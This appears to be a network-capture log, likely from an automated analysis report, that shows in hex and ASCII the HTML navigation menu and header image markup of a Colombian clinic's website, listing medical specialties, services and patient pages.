                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2939INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 63 6f 6e 74 61 63 74 6f 2f 61 67 65 6e 64 61 2d 74 75 2d 63 69 74 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 41 67 65 6e 64 61 20 74 75 20 63 69 74 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20
                                                                                                                                                                                                                                                        Data Ascii: <li class="menu-item "><a href="contacto/agenda-tu-cita" target="_self">Agenda tu cita</a></li> </ul> </li>
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2941INData Raw: 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 72 22 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 3d 22 6e 61 76 62 61 72 53 75 70 70 6f 72 74 65 64 43 6f 6e 74 65 6e 74 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 54 6f 67 67 6c 65 20 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 62 73 2d 74 6f 67 67 6c 65 3d 22 6f 66 66 63 61 6e 76 61 73 22 0a 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: v> </div> <button class="navbar-toggler" type="button" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation" data-bs-toggle="offcanvas"
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2942INData Raw: 3c 61 20 68 72 65 66 3d 22 23 73 75 62 6d 65 6e 75 2d 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 64 2d 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 62 65 74 77 65 65 6e 20 6d 65 6e 75 2d 69 74 65 6d 73 20 61 6c 69 67 6e 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 62 73 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 3e 20 4e 6f 73 6f 74 72 6f 73 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 61 6e 67 6c 65 2d 64 6f 77 6e 20 70 6f 73 69 74 69 6f 6e 2d
                                                                                                                                                                                                                                                        Data Ascii: <a href="#submenu-2" class="nav-link d-flex justify-content-between menu-items align-items-center" data-bs-toggle="collapse"> Nosotros <i class="fa fa-angle-down position-
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2943INData Raw: 61 76 2d 69 74 65 6d 20 70 73 2d 32 20 22 3e 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 6e 6f 73 6f 74 72 6f 73 2f 70 6f 6c 69 74 69 63 61 73 2d 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 50 6f 6c c3 ad 74 69 63 61 73 20 49 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: av-item ps-2 "><a class="nav-link" href="nosotros/politicas-institucionales" target="_self">Polticas Institucionales</a></li>
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2945INData Raw: 65 74 3d 22 5f 73 65 6c 66 22 3e 47 6f 62 69 65 72 6e 6f 20 43 6f 72 70 6f 72 61 74 69 76 6f 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 70 73 2d 32 20 22 3e 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 6e 6f 73 6f 74 72 6f 73 2f 73 69 73 74 65 6d 61 2d 64 65 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 74 65 72
                                                                                                                                                                                                                                                        Data Ascii: et="_self">Gobierno Corporativo</a></li> <li class="nav-item ps-2 "><a class="nav-link" href="nosotros/sistema-de-control-inter
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2946INData Raw: 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 6e 6f 73 6f 74 72 6f 73 2f 70 61 72 74 69 63 69 70 61 63 69 6f 6e 2d 73 6f 63 69 61 6c 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 50 61 72 74 69 63 69 70 61 63 69 c3 b3 6e 20 53 6f 63 69 61 6c 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: class="nav-link" href="nosotros/participacion-social" target="_self">Participacin Social</a></li>
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2947INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 23 73 75 62 73 75 62 6d 65 6e 75 2d 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 50 65 64 69 c3 a1 74 72 69 63 61 73 20 3c 69 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 61 6e 67 6c 65 2d 64 6f 77 6e 20 70 6f 73 69 74 69 6f 6e 2d 73 74 61 74 69 63 20 6d 73 2d 32 22 3e 3c 2f 69 3e 3c 2f 61 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61
                                                                                                                                                                                                                                                        Data Ascii: href="#subsubmenu-0"> Peditricas <i class="fa fa-angle-down position-static ms-2"></i></a> <ul cla
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2949INData Raw: 6e 61 76 2d 6c 69 6e 6b 22 3e 55 72 6f 6c 6f 67 c3 ad 61 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 70 73 2d 32 20 22 3e 3c 61 20 68 72 65 66 3d 22 65 73 70 65 63 69 61 6c 69 64 61 64 65 73 2f 70 65 64 69 61 74 72 69 63 61 73 2f 69 6e 66 65 63 74 6f 6c 6f 67 69 61 22 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: nav-link">Urologa</a> </li> <li class="nav-item ps-2 "><a href="especialidades/pediatricas/infectologia"
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2950INData Raw: 3d 22 65 73 70 65 63 69 61 6c 69 64 61 64 65 73 2f 70 65 64 69 61 74 72 69 63 61 73 2f 68 65 6d 61 74 6f 2d 6f 6e 63 6f 6c 6f 67 69 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 3e 48 65 6d 61 74 6f 20 2d 20 4f 6e 63 6f 6c 6f 67 c3 ad 61 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: ="especialidades/pediatricas/hemato-oncologia" target="_self" class="nav-link">Hemato - Oncologa</a>
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2951INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 70 73 2d 32 20 22 3e 3c 61 20 68 72 65 66 3d 22 65 73 70 65 63 69 61 6c 69 64 61 64 65 73 2f 70 65 64 69 61 74 72 69 63 61 73 2f 65 6e 64 6f 63 72 69 6e 6f 6c 6f 67 69 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: </li> <li class="nav-item ps-2 "><a href="especialidades/pediatricas/endocrinologia"
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2953INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 3e 4f 72 74 6f 70 65 64 69 61 20 6f 6e 63 6f 6c c3 b3 67 69 63 61 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: target="_self" class="nav-link">Ortopedia oncolgica</a> </li>
                                                                                                                                                                                                                                                        2023-10-09 13:52:09 UTC2954INData Raw: 2d 62 73 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 23 73 75 62 73 75 62 6d 65 6e 75 2d 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 47 69 6e 65 63 6f 62 73 74 65 74 72 69 63 69 61 73 20 3c 69 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 61 6e 67 6c 65 2d 64 6f 77 6e 20 70 6f 73 69 74 69 6f 6e 2d 73 74 61 74 69 63 20 6d 73 2d 32 22 3e 3c 2f 69 3e 3c 2f 61 3e
                                                                                                                                                                                                                                                        Data Ascii: -bs-toggle="collapse" href="#subsubmenu-1"> Ginecobstetricias <i class="fa fa-angle-down position-static ms-2"></i></a>
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC2965INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 70 73 2d 32 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 63 69 72 75 67 69 61 2f 63 61 72 64 69 6f 76 61 73 63 75 6c 61 72 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <li class="nav-item ps-2 "><a href="servicios/cirugia/cardiovascular" target="_self"
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC2969INData Raw: 65 72 76 69 63 69 6f 73 2f 63 69 72 75 67 69 61 2f 75 72 6f 6c 6f 67 69 63 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 3e 55 72 6f 6c c3 b3 67 69 63 61 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: ervicios/cirugia/urologica" target="_self" class="nav-link">Urolgica</a> </li>
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC2973INData Raw: 38 30 30 30 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 70 73 2d 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 64 2d 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 62 65 74 77 65 65 6e 22 20 64 61 74 61 2d 62 73 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 23 73 75 62 73 75 62 6d 65 6e
                                                                                                                                                                                                                                                        Data Ascii: 8000 <li class="nav-item ps-2"> <a class="nav-link d-flex justify-content-between" data-bs-toggle="collapse" href="#subsubmen
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC2977INData Raw: 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: </li> </ul> </li>
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC2981INData Raw: 69 63 69 6f 73 2f 61 73 65 73 6f 72 69 61 2d 65 6e 2d 6c 61 63 74 61 6e 63 69 61 2d 6d 61 74 65 72 6e 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 41 73 65 73 6f 72 c3 ad 61 20 65 6e 20 6c 61 63 74 61 6e 63 69 61 20 6d 61 74 65 72 6e 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: icios/asesoria-en-lactancia-materna" target="_self">Asesora en lactancia materna</a></li>
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC2985INData Raw: 3e 3c 61 20 68 72 65 66 3d 22 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 61 6c 2d 70 61 63 69 65 6e 74 65 2f 73 69 73 74 65 6d 61 2d 64 65 2d 69 6e 66 6f 72 6d 61 63 69 6f 6e 2d 79 2d 61 74 65 6e 63 69 6f 6e 2d 61 6c 2d 75 73 75 61 72 69 6f 2d 73 69 61 75 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 3e 53 69 73 74 65 6d 61 20 64 65 20 49 6e 66 6f 72 6d 61
                                                                                                                                                                                                                                                        Data Ascii: ><a href="pacientes/educacion-al-paciente/sistema-de-informacion-y-atencion-al-usuario-siau" target="_self" class="nav-link">Sistema de Informa
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC2990INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 70 73 2d 32 20 22 3e 3c 61 20 68 72 65 66 3d 22 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 61 6c 2d 70 61 63 69 65 6e 74 65 2f 76 61 63 75 6e 61 63 69 6f 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: </li> <li class="nav-item ps-2 "><a href="pacientes/educacion-al-paciente/vacunacion"
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC2994INData Raw: 6d 20 70 73 2d 32 20 22 3e 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 63 6f 6e 74 61 63 74 6f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 43 6f 6e 74 c3 a1 63 74 61 6e 6f 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: m ps-2 "><a class="nav-link" href="https://www.clinicasanluis.com.co/contacto" target="_self">Contctanos</a></li>
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC2998INData Raw: 52 4b 45 4e 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 53 4c 49 44 45 20 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c
                                                                                                                                                                                                                                                        Data Ascii: RKEN --> </li> ... SLIDE --> <l
                                                                                                                                                                                                                                                        2023-10-09 13:52:10 UTC3002INData Raw: 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 69 6d 61 67 65 73 2f 63 61 62 65 7a 6f 74 65 73 2d 6d 6f 62 69 6c 65 2f 77 65 62 2d 36 39 36 2d 35 37 37 2d 39 37 34 2e 77 65 62 70 22 20 61 6c 74 3d 22 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 6c 61 7a 79 6c 6f 61 64 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 69 6d 61 67 65 73 2f 63 61 62 65 7a 6f 74 65 73 2d 6d 6f 62 69 6c 65 2f 77 65 62 2d 36 39 36 2d 35 37 37 2d 39 37 34 2e 77 65 62 70 22 20 64 61 74 61 2d 6b 65 6e 62 75 72 6e 7a 6f 6f 6d 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e
                                                                                                                                                                                                                                                        Data Ascii: g src="https://www.clinicasanluis.com.co/images/cabezotes-mobile/web-696-577-974.webp" alt="" data-lazyload="https://www.clinicasanluis.com.co/images/cabezotes-mobile/web-696-577-974.webp" data-kenburnzoom="https://www.clin
